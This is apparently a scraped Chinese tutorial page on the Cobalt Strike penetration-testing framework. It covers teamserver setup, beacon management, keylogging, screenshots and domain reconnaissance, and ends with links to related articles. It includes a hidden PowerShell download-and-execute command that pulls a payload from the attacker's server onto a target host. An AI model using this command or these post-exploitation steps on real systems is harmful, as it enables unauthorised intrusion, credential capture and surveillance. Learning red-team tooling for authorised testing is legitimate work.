武器库Cobalt Strike
Cobalt Strike
前提条件,获得⼀台主机的Shell。
Cobalt Strike 是⼀款⾮常成熟的渗透测试框架。Cobalt Strike 在3.0 版本之前是基于Metasploit 框架⼯ 作的,可以使⽤Metasploit 漏洞库。从3.0 版本开始,Cobalt Strike 不再使⽤Metasploit 的漏洞库,称 为独⽴的渗透测试平台。
Cobalt Strike 是⽤java 语⾔编写的。其优点在于,可以进⾏团队协作,以搭载了Cobalt Strike 的 TeamServer 服务的服务器为中转站,使⽬标系统权限反弹到该TeamServer 服务器上。同时,Cobalt Strike 提供了良好的UI 界⾯。
Cobalt Strike 是⼀款商业软件,读者可以访问其官⽅⽹站,申请21 天测试版序列号。
01 部署和安装
Java 环境
java -version启动团队服务器
sudo ./teamserver 192.168.232.130 123456
启动客户端
./cobaltstrike
./start.sh
# 输⼊服务器地址、端⼝、⽤户名和密码
192.168.232.130 50050 123456
2 获取第⼀个beacon
⽣成监听器
⽣成Web Delivery
⽣成⽊⻢,⽂件或者命令
Attacks|Web Drive-by|ScriptedWeb Delivery
“上线命令”
在目标主机c:\输入生成的木马
powershell 是Windows 系统⾃带组件
# ⽆需上传⽂件到⽬标服务器磁盘powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.232.130:80/a'))"
上线成功
3 常⽤基本命令
基本beacon 管理
interact 进⼊命令⾏模式
Note 标注
Exit 退出
Remove 移除
sleep 响应时间获取当前⽤户权限
beacon> getuid
⽂件管理
建议⼤家在图形化界⾯操作
beacon|右键|Explore|File Browser
进程管理
建议在图形化界⾯操作
beacon|右键|Explore|Process List
屏幕截屏
#截屏
beacon|右键|Explore|Screenshots
#查看截屏
View|Screenshots
桌⾯控制
beacon> desktop
键盘记录
#键盘记录
beacon|右键|Explore|Process List|Log Keystrokes
#查看键盘记录
View Keystrokes
4 内⽹信息收集
端⼝扫描
beacon|右键|Explore|Port Scan
域内信息收集
net view
net computers
net dclist 列出域内的域控制器(Domain Controller,DC)
net domain_trusts
net group net localgroup net logons 查看已经登录账户
net sessions
net share
net user
net time 查看时间
5 主机账户信息收集
06 渗透内⽹DC
建⽴SMB 隧道
建⽴smb 监听器
Vpsexe
View-Targets
武器库Cobalt Strike相关推荐
- Cobalt Strike 的安装与简单使用
一.什么是Cobalt Strike Cobalt Strike 是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动. 二.如何使用 Cobalt Strik ...
- cobaltstrike扩展_Malwarebytes:使用可变C2下发Cobalt Strike的APT攻击
6月中旬,Malwarebytes Labs的研究人员发现了一个伪装成简历的恶意Word文档,该文档使用模板注入来删除.Net Loader.研究人员认为这是与APT攻击有关的多阶段攻击的第一部分.在 ...
- Mac安装Cobalt Strike 4 【亲测有用】
Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS.早期以Metasploit为基础的GUI框架式渗透测试工具,而现在Cobalt Strike已经不再使用MS ...
- Cobalt Strike 3.13的新功能
Cobalt Strike 3.13现已推出.此版本添加了TCP Beacong,进程参数欺骗,并将Obfuscate和Sleep功能扩展到SMB和TCP Beacons. TCP Beacon Co ...
- cobalt strike profile
cobalt strike 配置解读 此处以最新版 jquery-c2.4.3.profile文件解析 适应Cobalt Strike 4.3 版本 其他版本会有标注 cobalt strike 4. ...
- Cobalt Strike 域内渗透
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Co ...
- gophish配合邮件服务器,【CS】Cobalt Strike发送钓鱼邮件
0x00 简介 关于Spear phish 和发件人伪造的工具有很多个,比如gophish.SimpleEmailSpoofer.命令行工具swaks等,每个工具都有其特点,当然Cobalt Stri ...
- MoveKit:一款功能强大的Cobalt Strike横向渗透套件
关于MoveKit MoveKit是一款功能强大的Cobalt Strike横向渗透套件,本质上来说MoveKit是一个Cobalt Strike扩展,它利用的是SharpMove和SharpRDP ...
- DAY41:Cobalt Strike 工具使用
DAY41:Cobalt Strike 工具使用 1.Cobalt Strike 概述 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器. 自 3.0 以后已 ...
最新文章
- KubeSphere安装Mysql5.7
- Java虚拟机详解04----GC算法和种类【重要】
- 利用github-pages建立个人博客
- solr返回的字段带有中括号问题
- 速度是 macOS 的两倍?首个支持 M1 Mac 的 Linux 发行版终于出现
- 20211027:《Labuladong的算法小抄》学习记录(一)
- js准确获取当前页面url网址信息
- python必备基础代码-Python基础练习之用户登录实现代码分享
- redis之django-redis
- java item 类型参数_Java8中对Lambda表达式中方法参数的类型推断(一)
- CSDN 写作小技巧(3)——学会在 CSDN 中插入超链接
- 高德地图 Web JS API示例学习笔记(12)——Object3D 图形(通用接口、立体Mesh、线Line)
- GPON Type B保护
- 战地3皓月服务器的账号,【国内流畅联机 / 免橘子】皓月云-战地4 使用方法 !战士招募!...
- 题目1440:Goldbach's Conjecture(哥达巴赫猜想)
- 集成电路设计那些事儿
- 爬取猫眼上近期上映的电影及评分信息
- target=_blank的使用
- 【附源码】计算机毕业设计JAVA研究生推免系统
- ResultSet 中的getString 方法的用法